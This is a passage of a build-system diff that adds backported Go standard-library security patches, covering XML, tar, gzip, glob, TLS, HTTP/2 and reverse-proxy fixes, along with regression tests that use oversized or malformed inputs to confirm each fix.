178@@ -207,6 +207,11 @@ var parseTests = []parseTest{
179 // Valid repetitions.
180 {`((((((((((x{2}){2}){2}){2}){2}){2}){2}){2}){2}))`, ``},
181 {`((((((((((x{1}){2}){2}){2}){2}){2}){2}){2}){2}){2})`, ``},
182+
183+ // Valid nesting.
184+ {strings.Repeat("(", 999) + strings.Repeat(")", 999), ``},
185+ {strings.Repeat("(?:", 999) + strings.Repeat(")*", 999), ``},
186+ {"(" + strings.Repeat("|", 12345) + ")", ``}, // not nested at all
187 }
188
189 const testFlags = MatchNL | PerlX | UnicodeGroups
190@@ -482,6 +487,8 @@ var invalidRegexps = []string{
191 `a{100000}`,
192 `a{100000,}`,
193 "((((((((((x{2}){2}){2}){2}){2}){2}){2}){2}){2}){2})",
194+ strings.Repeat("(", 1000) + strings.Repeat(")", 1000),
195+ strings.Repeat("(?:", 1000) + strings.Repeat(")*", 1000),
196 `\Q\E*`,
197 }
198
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-27664.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-27664.patch
new file mode 100644
index 0000000000..238c3eac5b
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-27664.patch
@@ -0,0 +1,68 @@
1From 48c9076dcfc2dc894842ff758c8cfae7957c9565 Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Thu, 29 Sep 2022 17:06:18 +0530
4Subject: [PATCH] CVE-2022-27664
5
6Upstream-Status: Backport [https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479]
7CVE: CVE-2022-27664
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9---
10 src/net/http/h2_bundle.go | 21 +++++++++++++--------
11 1 file changed, 13 insertions(+), 8 deletions(-)
12
13diff --git a/src/net/http/h2_bundle.go b/src/net/http/h2_bundle.go
14index 65d851d..83f2a72 100644
15--- a/src/net/http/h2_bundle.go
16+++ b/src/net/http/h2_bundle.go
17@@ -3254,10 +3254,11 @@ var (
18 // name (key). See httpguts.ValidHeaderName for the base rules.
19 //
20 // Further, http2 says:
21-// "Just as in HTTP/1.x, header field names are strings of ASCII
22-// characters that are compared in a case-insensitive
23-// fashion. However, header field names MUST be converted to
24-// lowercase prior to their encoding in HTTP/2. "
25+//
26+// "Just as in HTTP/1.x, header field names are strings of ASCII
27+// characters that are compared in a case-insensitive
28+// fashion. However, header field names MUST be converted to
29+// lowercase prior to their encoding in HTTP/2. "
30 func http2validWireHeaderFieldName(v string) bool {
31 if len(v) == 0 {
32 return false
33@@ -3446,8 +3447,8 @@ func (s *http2sorter) SortStrings(ss []string) {
34 // validPseudoPath reports whether v is a valid :path pseudo-header
35 // value. It must be either:
36 //
37-// *) a non-empty string starting with '/'
38-// *) the string '*', for OPTIONS requests.
39+// *) a non-empty string starting with '/'
40+// *) the string '*', for OPTIONS requests.
41 //
42 // For now this is only used a quick check for deciding when to clean
43 // up Opaque URLs before sending requests from the Transport.
44@@ -4897,6 +4898,9 @@ func (sc *http2serverConn) startGracefulShutdownInternal() {
45 func (sc *http2serverConn) goAway(code http2ErrCode) {
46 sc.serveG.check()
47 if sc.inGoAway {
48+ if sc.goAwayCode == http2ErrCodeNo {
49+ sc.goAwayCode = code
50+ }
51 return
52 }
53 sc.inGoAway = true
54@@ -6091,8 +6095,9 @@ func (rws *http2responseWriterState) writeChunk(p []byte) (n int, err error) {
55 // prior to the headers being written. If the set of trailers is fixed
56 // or known before the header is written, the normal Go trailers mechanism
57 // is preferred:
58-// https://golang.org/pkg/net/http/#ResponseWriter
59-// https://golang.org/pkg/net/http/#example_ResponseWriter_trailers
60+//
61+// https://golang.org/pkg/net/http/#ResponseWriter
62+// https://golang.org/pkg/net/http/#example_ResponseWriter_trailers
63 const http2TrailerPrefix = "Trailer:"
64
65 // promoteUndeclaredTrailers permits http.Handlers to set trailers
66--
672.25.1
68
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-28131.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-28131.patch
new file mode 100644
index 0000000000..8afa292144
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-28131.patch
@@ -0,0 +1,104 @@
1From 8136eb2e5c316a51d0da710fbd0504cbbefee526 Mon Sep 17 00:00:00 2001
2From: Roland Shoemaker <roland@golang.org>
3Date: Mon, 28 Mar 2022 18:41:26 -0700
4Subject: [PATCH] encoding/xml: use iterative Skip, rather than recursive
5
6Upstream-Status: Backport [https://github.com/golang/go/commit/58facfbe7db2fbb9afed794b281a70bdb12a60ae]
7CVE: CVE-2022-28131
8Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
9
10
11Prevents exhausting the stack limit in _incredibly_ deeply nested
12structures.
13
14Fixes #53711
15Updates #53614
16Fixes CVE-2022-28131
17
18Change-Id: I47db4595ce10cecc29fbd06afce7b299868599e6
19Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1419912
20Reviewed-by: Julie Qiu <julieqiu@google.com>
21Reviewed-by: Damien Neil <dneil@google.com>
22(cherry picked from commit 9278cb78443d2b4deb24cbb5b61c9ba5ac688d49)
23Reviewed-on: https://go-review.googlesource.com/c/go/+/417068
24TryBot-Result: Gopher Robot <gobot@golang.org>
25Reviewed-by: Heschi Kreinick <heschi@google.com>
26Run-TryBot: Michael Knyszek <mknyszek@google.com>
27---
28 src/encoding/xml/read.go | 15 ++++++++-------
29 src/encoding/xml/read_test.go | 18 ++++++++++++++++++
30 2 files changed, 26 insertions(+), 7 deletions(-)
31
32diff --git a/src/encoding/xml/read.go b/src/encoding/xml/read.go
33index 4ffed80..3fac859 100644
34--- a/src/encoding/xml/read.go
35+++ b/src/encoding/xml/read.go
36@@ -743,12 +743,12 @@ Loop:
37 }
38
39 // Skip reads tokens until it has consumed the end element
40-// matching the most recent start element already consumed.
41-// It recurs if it encounters a start element, so it can be used to
42-// skip nested structures.
43+// matching the most recent start element already consumed,
44+// skipping nested structures.
45 // It returns nil if it finds an end element matching the start
46 // element; otherwise it returns an error describing the problem.
47 func (d *Decoder) Skip() error {
48+ var depth int64
49 for {
50 tok, err := d.Token()
51 if err != nil {
52@@ -756,11 +756,12 @@ func (d *Decoder) Skip() error {
53 }
54 switch tok.(type) {
55 case StartElement:
56- if err := d.Skip(); err != nil {
57- return err
58- }
59+ depth++
60 case EndElement:
61- return nil
62+ if depth == 0 {
63+ return nil
64+ }
65+ depth--
66 }
67 }
68 }
69diff --git a/src/encoding/xml/read_test.go b/src/encoding/xml/read_test.go
70index 6a20b1a..7a621a5 100644
71--- a/src/encoding/xml/read_test.go
72+++ b/src/encoding/xml/read_test.go
73@@ -5,9 +5,11 @@
74 package xml
75
76 import (
77+ "bytes"
78 "errors"
79 "io"
80 "reflect"
81+ "runtime"
82 "strings"
83 "testing"
84 "time"
85@@ -1093,3 +1095,19 @@ func TestCVE202228131(t *testing.T) {
86 t.Fatalf("Unmarshal unexpected error: got %q, want %q", err, errExeceededMaxUnmarshalDepth)
87 }
88 }
89+
90+func TestCVE202230633(t *testing.T) {
91+ if runtime.GOARCH == "wasm" {
92+ t.Skip("causes memory exhaustion on js/wasm")
93+ }
94+ defer func() {
95+ p := recover()
96+ if p != nil {
97+ t.Fatal("Unmarshal panicked")
98+ }
99+ }()
100+ var example struct {
101+ Things []string
102+ }
103+ Unmarshal(bytes.Repeat([]byte("<a>"), 17_000_000), &example)
104+}
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-28327.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-28327.patch
new file mode 100644
index 0000000000..6361deec7d
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-28327.patch
@@ -0,0 +1,36 @@
1From 34d9ab78568d63d8097911237897b188bdaba9c2 Mon Sep 17 00:00:00 2001
2From: Filippo Valsorda <filippo@golang.org>
3Date: Thu, 31 Mar 2022 12:31:58 -0400
4Subject: [PATCH] crypto/elliptic: tolerate zero-padded scalars in generic
5 P-256
6
7Upstream-Status: Backport [https://github.com/golang/go/commit/7139e8b024604ab168b51b99c6e8168257a5bf58]
8CVE: CVE-2022-28327
9Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
10
11
12Updates #52075
13Fixes #52076
14Fixes CVE-2022-28327
15
16Change-Id: I595a7514c9a0aa1b9c76aedfc2307e1124271f27
17Reviewed-on: https://go-review.googlesource.com/c/go/+/397136
18Trust: Filippo Valsorda <filippo@golang.org>
19Reviewed-by: Julie Qiu <julie@golang.org>
20---
21 src/crypto/elliptic/p256.go | 2 +-
22 1 file changed, 1 insertion(+), 1 deletion(-)
23
24diff --git a/src/crypto/elliptic/p256.go b/src/crypto/elliptic/p256.go
25index c23e414..787e3e7 100644
26--- a/src/crypto/elliptic/p256.go
27+++ b/src/crypto/elliptic/p256.go
28@@ -51,7 +51,7 @@ func p256GetScalar(out *[32]byte, in []byte) {
29 n := new(big.Int).SetBytes(in)
30 var scalarBytes []byte
31
32- if n.Cmp(p256Params.N) >= 0 {
33+ if n.Cmp(p256Params.N) >= 0 || len(in) > len(out) {
34 n.Mod(n, p256Params.N)
35 scalarBytes = n.Bytes()
36 } else {
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-2879.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-2879.patch
new file mode 100644
index 0000000000..ea04a82d16
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-2879.patch
@@ -0,0 +1,111 @@
1From 9d339f1d0f53c4116a7cb4acfa895f31a07212ee Mon Sep 17 00:00:00 2001
2From: Damien Neil <dneil@google.com>
3Date: Fri, 2 Sep 2022 20:45:18 -0700
4Subject: [PATCH] archive/tar: limit size of headers
5
6Set a 1MiB limit on special file blocks (PAX headers, GNU long names,
7GNU link names), to avoid reading arbitrarily large amounts of data
8into memory.
9
10Thanks to Adam Korczynski (ADA Logics) and OSS-Fuzz for reporting
11this issue.
12
13Fixes CVE-2022-2879
14Updates #54853
15Fixes #55926
16
17Change-Id: I85136d6ff1e0af101a112190e027987ab4335680
18Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1565555
19Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
20Run-TryBot: Roland Shoemaker <bracewell@google.com>
21Reviewed-by: Roland Shoemaker <bracewell@google.com>
22(cherry picked from commit 6ee768cef6b82adf7a90dcf367a1699ef694f3b2)
23Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1591053
24Reviewed-by: Julie Qiu <julieqiu@google.com>
25Reviewed-by: Damien Neil <dneil@google.com>
26Reviewed-on: https://go-review.googlesource.com/c/go/+/438498
27TryBot-Result: Gopher Robot <gobot@golang.org>
28Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
29Reviewed-by: Carlos Amedee <carlos@golang.org>
30Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
31Run-TryBot: Carlos Amedee <carlos@golang.org>
32
33Upstream-Status: Backport [https://github.com/golang/go/commit/0a723816cd2]
34CVE: CVE-2022-2879
35Signed-off-by: Sunil Kumar <sukumar@mvista.com>
36---
37 src/archive/tar/format.go | 4 ++++
38 src/archive/tar/reader.go | 14 ++++++++++++--
39 src/archive/tar/writer.go | 3 +++
40 3 files changed, 19 insertions(+), 2 deletions(-)
41
42diff --git a/src/archive/tar/format.go b/src/archive/tar/format.go
43index cfe24a5..6642364 100644
44--- a/src/archive/tar/format.go
45+++ b/src/archive/tar/format.go
46@@ -143,6 +143,10 @@ const (
47 blockSize = 512 // Size of each block in a tar stream
48 nameSize = 100 // Max length of the name field in USTAR format
49 prefixSize = 155 // Max length of the prefix field in USTAR format
50+
51+ // Max length of a special file (PAX header, GNU long name or link).
52+ // This matches the limit used by libarchive.
53+ maxSpecialFileSize = 1 << 20
54 )
55
56 // blockPadding computes the number of bytes needed to pad offset up to the
57diff --git a/src/archive/tar/reader.go b/src/archive/tar/reader.go
58index 4f9135b..e996595 100644
59--- a/src/archive/tar/reader.go
60+++ b/src/archive/tar/reader.go
61@@ -104,7 +104,7 @@ func (tr *Reader) next() (*Header, error) {
62 continue // This is a meta header affecting the next header
63 case TypeGNULongName, TypeGNULongLink:
64 format.mayOnlyBe(FormatGNU)
65- realname, err := ioutil.ReadAll(tr)
66+ realname, err := readSpecialFile(tr)
67 if err != nil {
68 return nil, err
69 }
70@@ -294,7 +294,7 @@ func mergePAX(hdr *Header, paxHdrs map[string]string) (err error) {
71 // parsePAX parses PAX headers.
72 // If an extended header (type 'x') is invalid, ErrHeader is returned
73 func parsePAX(r io.Reader) (map[string]string, error) {
74- buf, err := ioutil.ReadAll(r)
75+ buf, err := readSpecialFile(r)
76 if err != nil {
77 return nil, err
78 }
79@@ -827,6 +827,16 @@ func tryReadFull(r io.Reader, b []byte) (n int, err error) {
80 return n, err
81 }
82
83+// readSpecialFile is like ioutil.ReadAll except it returns
84+// ErrFieldTooLong if more than maxSpecialFileSize is read.
85+func readSpecialFile(r io.Reader) ([]byte, error) {
86+ buf, err := ioutil.ReadAll(io.LimitReader(r, maxSpecialFileSize+1))
87+ if len(buf) > maxSpecialFileSize {
88+ return nil, ErrFieldTooLong
89+ }
90+ return buf, err
91+}
92+
93 // discard skips n bytes in r, reporting an error if unable to do so.
94 func discard(r io.Reader, n int64) error {
95 // If possible, Seek to the last byte before the end of the data section.
96diff --git a/src/archive/tar/writer.go b/src/archive/tar/writer.go
97index e80498d..893eac0 100644
98--- a/src/archive/tar/writer.go
99+++ b/src/archive/tar/writer.go
100@@ -199,6 +199,9 @@ func (tw *Writer) writePAXHeader(hdr *Header, paxHdrs map[string]string) error {
101 flag = TypeXHeader
102 }
103 data := buf.String()
104+ if len(data) > maxSpecialFileSize {
105+ return ErrFieldTooLong
106+ }
107 if err := tw.writeRawFile(name, data, flag, FormatPAX); err != nil || isGlobal {
108 return err // Global headers return here
109 }
110--
1112.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-2880.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-2880.patch
new file mode 100644
index 0000000000..8376dc45ba
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-2880.patch
@@ -0,0 +1,164 @@
1From 753e3f8da191c2ac400407d83c70f46900769417 Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Thu, 27 Oct 2022 12:22:41 +0530
4Subject: [PATCH] CVE-2022-2880
5
6Upstream-Status: Backport [https://github.com/golang/go/commit/9d2c73a9fd69e45876509bb3bdb2af99bf77da1e]
7CVE: CVE-2022-2880
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9
10net/http/httputil: avoid query parameter
11
12Query parameter smuggling occurs when a proxy's interpretation
13of query parameters differs from that of a downstream server.
14Change ReverseProxy to avoid forwarding ignored query parameters.
15
16Remove unparsable query parameters from the outbound request
17
18 * if req.Form != nil after calling ReverseProxy.Director; and
19 * before calling ReverseProxy.Rewrite.
20
21This change preserves the existing behavior of forwarding the
22raw query untouched if a Director hook does not parse the query
23by calling Request.ParseForm (possibly indirectly).
24---
25 src/net/http/httputil/reverseproxy.go | 36 +++++++++++
26 src/net/http/httputil/reverseproxy_test.go | 74 ++++++++++++++++++++++
27 2 files changed, 110 insertions(+)
28
29diff --git a/src/net/http/httputil/reverseproxy.go b/src/net/http/httputil/reverseproxy.go
30index 2072a5f..c6fb873 100644
31--- a/src/net/http/httputil/reverseproxy.go
32+++ b/src/net/http/httputil/reverseproxy.go
33@@ -212,6 +212,9 @@ func (p *ReverseProxy) ServeHTTP(rw http.ResponseWriter, req *http.Request) {
34 }
35
36 p.Director(outreq)
37+ if outreq.Form != nil {
38+ outreq.URL.RawQuery = cleanQueryParams(outreq.URL.RawQuery)
39+ }
40 outreq.Close = false
41
42 reqUpType := upgradeType(outreq.Header)
43@@ -561,3 +564,36 @@ func (c switchProtocolCopier) copyToBackend(errc chan<- error) {
44 _, err := io.Copy(c.backend, c.user)
45 errc <- err
46 }
47+
48+func cleanQueryParams(s string) string {
49+ reencode := func(s string) string {
50+ v, _ := url.ParseQuery(s)
51+ return v.Encode()
52+ }
53+ for i := 0; i < len(s); {
54+ switch s[i] {
55+ case ';':
56+ return reencode(s)
57+ case '%':
58+ if i+2 >= len(s) || !ishex(s[i+1]) || !ishex(s[i+2]) {
59+ return reencode(s)
60+ }
61+ i += 3
62+ default:
63+ i++
64+ }
65+ }
66+ return s
67+}
68+
69+func ishex(c byte) bool {
70+ switch {
71+ case '0' <= c && c <= '9':
72+ return true
73+ case 'a' <= c && c <= 'f':
74+ return true
75+ case 'A' <= c && c <= 'F':
76+ return true
77+ }
78+ return false
79+}
80diff --git a/src/net/http/httputil/reverseproxy_test.go b/src/net/http/httputil/reverseproxy_test.go
81index 9a7223a..bc87a3b 100644
82--- a/src/net/http/httputil/reverseproxy_test.go
83+++ b/src/net/http/httputil/reverseproxy_test.go
84@@ -1269,3 +1269,77 @@ func TestSingleJoinSlash(t *testing.T) {
85 }
86 }
87 }
88+
89+const (
90+ testWantsCleanQuery = true
91+ testWantsRawQuery = false
92+)
93+
94+func TestReverseProxyQueryParameterSmugglingDirectorDoesNotParseForm(t *testing.T) {
95+ testReverseProxyQueryParameterSmuggling(t, testWantsRawQuery, func(u *url.URL) *ReverseProxy {
96+ proxyHandler := NewSingleHostReverseProxy(u)
97+ oldDirector := proxyHandler.Director
98+ proxyHandler.Director = func(r *http.Request) {
99+ oldDirector(r)
100+ }
101+ return proxyHandler
102+ })
103+}
104+
105+func TestReverseProxyQueryParameterSmugglingDirectorParsesForm(t *testing.T) {
106+ testReverseProxyQueryParameterSmuggling(t, testWantsCleanQuery, func(u *url.URL) *ReverseProxy {
107+ proxyHandler := NewSingleHostReverseProxy(u)
108+ oldDirector := proxyHandler.Director
109+ proxyHandler.Director = func(r *http.Request) {
110+ // Parsing the form causes ReverseProxy to remove unparsable
111+ // query parameters before forwarding.
112+ r.FormValue("a")
113+ oldDirector(r)
114+ }
115+ return proxyHandler
116+ })
117+}
118+
119+func testReverseProxyQueryParameterSmuggling(t *testing.T, wantCleanQuery bool, newProxy func(*url.URL) *ReverseProxy) {
120+ const content = "response_content"
121+ backend := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
122+ w.Write([]byte(r.URL.RawQuery))
123+ }))
124+ defer backend.Close()
125+ backendURL, err := url.Parse(backend.URL)
126+ if err != nil {
127+ t.Fatal(err)
128+ }
129+ proxyHandler := newProxy(backendURL)
130+ frontend := httptest.NewServer(proxyHandler)
131+ defer frontend.Close()
132+
133+ // Don't spam output with logs of queries containing semicolons.
134+ backend.Config.ErrorLog = log.New(io.Discard, "", 0)
135+ frontend.Config.ErrorLog = log.New(io.Discard, "", 0)
136+
137+ for _, test := range []struct {
138+ rawQuery string
139+ cleanQuery string
140+ }{{
141+ rawQuery: "a=1&a=2;b=3",
142+ cleanQuery: "a=1",
143+ }, {
144+ rawQuery: "a=1&a=%zz&b=3",
145+ cleanQuery: "a=1&b=3",
146+ }} {
147+ res, err := frontend.Client().Get(frontend.URL + "?" + test.rawQuery)
148+ if err != nil {
149+ t.Fatalf("Get: %v", err)
150+ }
151+ defer res.Body.Close()
152+ body, _ := io.ReadAll(res.Body)
153+ wantQuery := test.rawQuery
154+ if wantCleanQuery {
155+ wantQuery = test.cleanQuery
156+ }
157+ if got, want := string(body), wantQuery; got != want {
158+ t.Errorf("proxy forwarded raw query %q as %q, want %q", test.rawQuery, got, want)
159+ }
160+ }
161+}
162--
1632.25.1
164
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-30629.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-30629.patch
new file mode 100644
index 0000000000..47313a547f
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-30629.patch
@@ -0,0 +1,47 @@
1From 8d0bbb5a6280c2cf951241ec7f6579c90d38df57 Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Thu, 25 Aug 2022 10:55:08 +0530
4Subject: [PATCH] CVE-2022-30629
5
6Upstream-Status: Backport [https://github.com/golang/go/commit/c15a8e2dbb5ac376a6ed890735341b812d6b965c]
7CVE: CVE-2022-30629
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9---
10 src/crypto/tls/handshake_server_tls13.go | 14 ++++++++++++++
11 1 file changed, 14 insertions(+)
12
13diff --git a/src/crypto/tls/handshake_server_tls13.go b/src/crypto/tls/handshake_server_tls13.go
14index 5432145..d91797e 100644
15--- a/src/crypto/tls/handshake_server_tls13.go
16+++ b/src/crypto/tls/handshake_server_tls13.go
17@@ -9,6 +9,7 @@ import (
18 "crypto"
19 "crypto/hmac"
20 "crypto/rsa"
21+ "encoding/binary"
22 "errors"
23 "hash"
24 "io"
25@@ -742,6 +743,19 @@ func (hs *serverHandshakeStateTLS13) sendSessionTickets() error {
26 }
27 m.lifetime = uint32(maxSessionTicketLifetime / time.Second)
28
29+ // ticket_age_add is a random 32-bit value. See RFC 8446, section 4.6.1
30+ // The value is not stored anywhere; we never need to check the ticket age
31+ // because 0-RTT is not supported.
32+ ageAdd := make([]byte, 4)
33+ _, err = hs.c.config.rand().Read(ageAdd)
34+ if err != nil {
35+ return err
36+ }
37+ m.ageAdd = binary.LittleEndian.Uint32(ageAdd)
38+
39+ // ticket_nonce, which must be unique per connection, is always left at
40+ // zero because we only ever send one ticket per connection.
41+
42 if _, err := c.writeRecord(recordTypeHandshake, m.marshal()); err != nil {
43 return err
44 }
45--
462.25.1
47
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-30631.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-30631.patch
new file mode 100644
index 0000000000..5dcfd27f16
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-30631.patch
@@ -0,0 +1,116 @@
1From d10fc3a84e3344f2421c1dd3046faa50709ab4d5 Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Thu, 25 Aug 2022 11:01:21 +0530
4Subject: [PATCH] CVE-2022-30631
5
6Upstream-Status: Backport [https://github.com/golang/go/commit/0117dee7dccbbd7803d88f65a2ce8bd686219ad3]
7CVE: CVE-2022-30631
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9---
10 src/compress/gzip/gunzip.go | 60 +++++++++++++++-----------------
11 src/compress/gzip/gunzip_test.go | 16 +++++++++
12 2 files changed, 45 insertions(+), 31 deletions(-)
13
14diff --git a/src/compress/gzip/gunzip.go b/src/compress/gzip/gunzip.go
15index 924bce1..237b2b9 100644
16--- a/src/compress/gzip/gunzip.go
17+++ b/src/compress/gzip/gunzip.go
18@@ -248,42 +248,40 @@ func (z *Reader) Read(p []byte) (n int, err error) {
19 return 0, z.err
20 }
21
22- n, z.err = z.decompressor.Read(p)
23- z.digest = crc32.Update(z.digest, crc32.IEEETable, p[:n])
24- z.size += uint32(n)
25- if z.err != io.EOF {
26- // In the normal case we return here.
27- return n, z.err
28- }
29+ for n == 0 {
30+ n, z.err = z.decompressor.Read(p)
31+ z.digest = crc32.Update(z.digest, crc32.IEEETable, p[:n])
32+ z.size += uint32(n)
33+ if z.err != io.EOF {
34+ // In the normal case we return here.
35+ return n, z.err
36+ }
37
38- // Finished file; check checksum and size.
39- if _, err := io.ReadFull(z.r, z.buf[:8]); err != nil {
40- z.err = noEOF(err)
41- return n, z.err
42- }
43- digest := le.Uint32(z.buf[:4])
44- size := le.Uint32(z.buf[4:8])
45- if digest != z.digest || size != z.size {
46- z.err = ErrChecksum
47- return n, z.err
48- }
49- z.digest, z.size = 0, 0
50+ // Finished file; check checksum and size.
51+ if _, err := io.ReadFull(z.r, z.buf[:8]); err != nil {
52+ z.err = noEOF(err)
53+ return n, z.err
54+ }
55+ digest := le.Uint32(z.buf[:4])
56+ size := le.Uint32(z.buf[4:8])
57+ if digest != z.digest || size != z.size {
58+ z.err = ErrChecksum
59+ return n, z.err
60+ }
61+ z.digest, z.size = 0, 0
62
63- // File is ok; check if there is another.
64- if !z.multistream {
65- return n, io.EOF
66- }
67- z.err = nil // Remove io.EOF
68+ // File is ok; check if there is another.
69+ if !z.multistream {
70+ return n, io.EOF
71+ }
72+ z.err = nil // Remove io.EOF
73
74- if _, z.err = z.readHeader(); z.err != nil {
75- return n, z.err
76+ if _, z.err = z.readHeader(); z.err != nil {
77+ return n, z.err
78+ }
79 }
80
81- // Read from next file, if necessary.
82- if n > 0 {
83- return n, nil
84- }
85- return z.Read(p)
86+ return n, nil
87 }
88
89 // Close closes the Reader. It does not close the underlying io.Reader.
90diff --git a/src/compress/gzip/gunzip_test.go b/src/compress/gzip/gunzip_test.go
91index 1b01404..95220ae 100644
92--- a/src/compress/gzip/gunzip_test.go
93+++ b/src/compress/gzip/gunzip_test.go
94@@ -516,3 +516,19 @@ func TestTruncatedStreams(t *testing.T) {
95 }
96 }
97 }
98+
99+func TestCVE202230631(t *testing.T) {
100+ var empty = []byte{0x1f, 0x8b, 0x08, 0x00, 0xa7, 0x8f, 0x43, 0x62, 0x00,
101+ 0x03, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}
102+ r := bytes.NewReader(bytes.Repeat(empty, 4e6))
103+ z, err := NewReader(r)
104+ if err != nil {
105+ t.Fatalf("NewReader: got %v, want nil", err)
106+ }
107+ // Prior to CVE-2022-30631 fix, this would cause an unrecoverable panic due
108+ // to stack exhaustion.
109+ _, err = z.Read(make([]byte, 10))
110+ if err != io.EOF {
111+ t.Errorf("Reader.Read: got %v, want %v", err, io.EOF)
112+ }
113+}
114--
1152.25.1
116
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-30632.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-30632.patch
new file mode 100644
index 0000000000..c54ef56a0e
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-30632.patch
@@ -0,0 +1,71 @@
1From 35d1dfe9746029aea9027b405c75555d41ffd2f8 Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Thu, 25 Aug 2022 13:12:40 +0530
4Subject: [PATCH] CVE-2022-30632
5
6Upstream-Status: Backport [https://github.com/golang/go/commit/76f8b7304d1f7c25834e2a0cc9e88c55276c47df]
7CVE: CVE-2022-30632
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9---
10 src/path/filepath/match.go | 16 +++++++++++++++-
11 src/path/filepath/match_test.go | 10 ++++++++++
12 2 files changed, 25 insertions(+), 1 deletion(-)
13
14diff --git a/src/path/filepath/match.go b/src/path/filepath/match.go
15index 46badb5..ba68daa 100644
16--- a/src/path/filepath/match.go
17+++ b/src/path/filepath/match.go
18@@ -232,6 +232,20 @@ func getEsc(chunk string) (r rune, nchunk string, err error) {
19 // The only possible returned error is ErrBadPattern, when pattern
20 // is malformed.
21 func Glob(pattern string) (matches []string, err error) {
22+ return globWithLimit(pattern, 0)
23+}
24+
25+func globWithLimit(pattern string, depth int) (matches []string, err error) {
26+ // This limit is used prevent stack exhaustion issues. See CVE-2022-30632.
27+ const pathSeparatorsLimit = 10000
28+ if depth == pathSeparatorsLimit {
29+ return nil, ErrBadPattern
30+ }
31+
32+ // Check pattern is well-formed.
33+ if _, err := Match(pattern, ""); err != nil {
34+ return nil, err
35+ }
36 if !hasMeta(pattern) {
37 if _, err = os.Lstat(pattern); err != nil {
38 return nil, nil
39@@ -257,7 +271,7 @@ func Glob(pattern string) (matches []string, err error) {
40 }
41
42 var m []string
43- m, err = Glob(dir)
44+ m, err = globWithLimit(dir, depth+1)
45 if err != nil {
46 return
47 }
48diff --git a/src/path/filepath/match_test.go b/src/path/filepath/match_test.go
49index b865762..c37c812 100644
50--- a/src/path/filepath/match_test.go
51+++ b/src/path/filepath/match_test.go
52@@ -154,6 +154,16 @@ func TestGlob(t *testing.T) {
53 }
54 }
55
56+func TestCVE202230632(t *testing.T) {
57+ // Prior to CVE-2022-30632, this would cause a stack exhaustion given a
58+ // large number of separators (more than 4,000,000). There is now a limit
59+ // of 10,000.
60+ _, err := Glob("/*" + strings.Repeat("/", 10001))
61+ if err != ErrBadPattern {
62+ t.Fatalf("Glob returned err=%v, want ErrBadPattern", err)
63+ }
64+}
65+
66 func TestGlobError(t *testing.T) {
67 _, err := Glob("[]")
68 if err == nil {
69--
702.25.1
71
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-30633.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-30633.patch
new file mode 100644
index 0000000000..c16cb5f50c
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-30633.patch
@@ -0,0 +1,131 @@
1From ab6e2ffdcab0501bcc2de4b196c1c18ae2301d4b Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Thu, 25 Aug 2022 13:29:55 +0530
4Subject: [PATCH] CVE-2022-30633
5
6Upstream-Status: Backport [https://github.com/golang/go/commit/2678d0c957193dceef336c969a9da74dd716a827]
7CVE: CVE-2022-30633
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9---
10 src/encoding/xml/read.go | 27 +++++++++++++++++++--------
11 src/encoding/xml/read_test.go | 14 ++++++++++++++
12 2 files changed, 33 insertions(+), 8 deletions(-)
13
14diff --git a/src/encoding/xml/read.go b/src/encoding/xml/read.go
15index 10a60ee..4ffed80 100644
16--- a/src/encoding/xml/read.go
17+++ b/src/encoding/xml/read.go
18@@ -148,7 +148,7 @@ func (d *Decoder) DecodeElement(v interface{}, start *StartElement) error {
